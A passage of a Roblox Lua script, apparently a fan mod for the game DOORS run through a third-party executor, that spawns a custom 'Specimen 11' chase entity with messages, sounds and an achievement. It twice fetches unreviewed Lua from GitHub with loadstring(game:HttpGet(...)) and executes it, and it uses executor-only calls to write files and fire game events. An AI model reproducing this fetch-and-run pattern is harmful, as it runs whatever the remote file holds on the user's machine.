msg.BackgroundColor3 = Color3.fromRGB(86, 70, 60)
msg.BackgroundTransparency = 0.5
msg.Size = UDim2.new(0.3, 0, 0.1, 0)
msg.Position = UDim2.new(0.37, 0, 0.8, 0)
local UIC = Instance.new("UICorner")
UIC.Parent = msg
UIC.CornerRadius = UDim.new(0, 15)
local TL = Instance.new("TextLabel")
TL.Name = "Message"
TL.Font = "Oswald"
TL.Parent = msg
TL.Text = abb
TL.TextColor3 = Color3.fromRGB(255, 0, 0)
TL.Position = UDim2.new(0.49, 0, 0.5, 0)
TL.TextSize = 28
TL.BorderSizePixel = 0

local TW2 = {}
TW2.BackgroundTransparency = 1
local TW3 = {}
TW3.TextTransparency = 1
local tI = TweenInfo.new(last)
tw = TS:Create(msg, tI, TW2)
tw:Play()
twa = TS:Create(TL, tI, TW3)
twa:Play()
wait(last)
game.Players.LocalPlayer.PlayerGui.CustomMessages:Destroy()
end
--
mesg("666 666 6666 6666", 10)
wait(0)
function mesg(abb, last)
local TS = game:GetService("TweenService")
local message = Instance.new("ScreenGui")
message.Name = "CustomMessages"
message.Parent = game.Players.LocalPlayer.PlayerGui
local msg = Instance.new("Frame")
msg.Name = "msg"
msg.Parent = message
msg.BackgroundColor3 = Color3.fromRGB(86, 70, 60)
msg.BackgroundTransparency = 0.5
msg.Size = UDim2.new(0.3, 0, 0.1, 0)
msg.Position = UDim2.new(0.37, 0, 0.8, 0)
local UIC = Instance.new("UICorner")
UIC.Parent = msg
UIC.CornerRadius = UDim.new(0, 15)
local TL = Instance.new("TextLabel")
TL.Name = "Message"
TL.Font = "Oswald"
TL.Parent = msg
TL.Text = abb
TL.TextColor3 = Color3.fromRGB(255, 0, 0)
TL.Position = UDim2.new(0.49, 0, 0.5, 0)
TL.TextSize = 28
TL.BorderSizePixel = 0

local TW2 = {}
TW2.BackgroundTransparency = 1
local TW3 = {}
TW3.TextTransparency = 1
local tI = TweenInfo.new(last)
tw = TS:Create(msg, tI, TW2)
tw:Play()
twa = TS:Create(TL, tI, TW3)
twa:Play()
wait(last)
game.Players.LocalPlayer.PlayerGui.CustomMessages:Destroy()
end
--
mesg("RUN NOW!!", 10)
local Creator = loadstring(game:HttpGet("https://raw.githubusercontent.com/RegularVynixu/Utilities/main/Doors%20Entity%20Spawner/Source.lua"))()
			-- Create entity
			local entity = Creator.createEntity({
				Model = "8664277404",
				Speed = 30,
				DelayTime = 3,
				HeightOffset = 6,
				CanKill = true,
				BreakLights = true,
				FlickerLights = {
					true,
					40,
				},
				Cycles = {
					Min = 1,
					Max = 1,
					WaitTime = 0.1,
				},
				CamShake = {
					true,
					{5, 15, 0.1, 1},
					10,
				},
				Jumpscare = {
					false, -- Enabled ('false' if you don't want jumpscare)
					{
						Image1 = "rbxassetid://11394027278", -- Image1 url
						Image2 = "rbxassetid://11395249153", -- Image2 url
						Shake = true,
						Sound1 = {
							10483790459, -- SoundId
							{ Volume = 0.5 }, -- Sound properties
						},
						Sound2 = {
							10483837590, -- SoundId
							{ Volume = 0.5 }, -- Sound properties
						},
						Flashing = {
							true, -- Enabled
							Color3.fromRGB(48, 25, 52), -- Color
						},
						Tease = {
							false, -- Enabled ('false' if you don't want tease)
							Min = 1,
							Max = 1,
						},
					},
				},
				CustomDialog = {"You died to whom you call The Deer God","Closets Wont work! So try running","Its form is incomprehensible to a human upclose...","..-so avoid Eye Contact" }
			})
			local function GetGitSound(GithubSnd,SoundName)
				local url=GithubSnd
				if not isfile(SoundName..".mp3") then
					writefile(SoundName..".mp3", game:HttpGet(url))
				end
				local sound=Instance.new("Sound")
				sound.SoundId=(getcustomasset or getsynasset)(SoundName..".mp3")
				return sound
			end
			local Chase = GetGitSound("https://github.com/Brololto/Specimen-11-chase/blob/main/Screen_Recording_20230327-185448_YouTube%20(online-audio-converter.com).mp3?raw=true","Specimen11chase")
			Chase.Parent = workspace
			Chase.Volume = 6
			local cameraShaker = require(game.ReplicatedStorage.CameraShaker)
			local camera = workspace.CurrentCamera

			local camShake = cameraShaker.new(Enum.RenderPriority.Camera.Value, function(cf)
				camera.CFrame = camera.CFrame * cf
			end)
			camShake:Start()
			-----[[ Advanced ]]-----
			entity.Debug.OnEntitySpawned = function(entity)
				Chase:Play()
				game.TweenService:Create(Chase,TweenInfo.new(5),{Volume = 0.7}):Play()
				camShake:ShakeSustain(cameraShaker.Presets.Earthquake)
			end

			entity.Debug.OnEntityDespawned = function(entity)
				local Achievements = loadstring(game:HttpGet("https://raw.githubusercontent.com/RegularVynixu/Utilities/main/Doors/Custom%20Achievements/Source.lua"))()

-- Creates and displays your custom achievement
Achievements.Get({
    Title = "Wheres The Beef.",
    Desc = "Im hungry.",
    Reason = "Survive Food demon",
    Image = "https://github.com/Brololto/specimen-11/blob/main/348-3481884_spec-11-spooky-house-specimen-11.png?raw=true",
    })
			end

			entity.Debug.OnEntityStartMoving = function(entity)

			end

			entity.Debug.OnEntityFinishedRebound = function(entity)

			end

			entity.Debug.OnDeath = function()
				getgenv().death = true
				firesignal(game.ReplicatedStorage.EntityInfo.DeathHint.OnClientEvent, {"You died to whon you call Specimen 11", "it's a floating figure that chase you, try not to get caught.", "pay attention to any cuses that hints at its arrival."}, "Blue")
			end
			---------------------------

			-- Run the created entity
			Creator.runEntity(entity)
            pcall(hungerrrr)
         end
end)



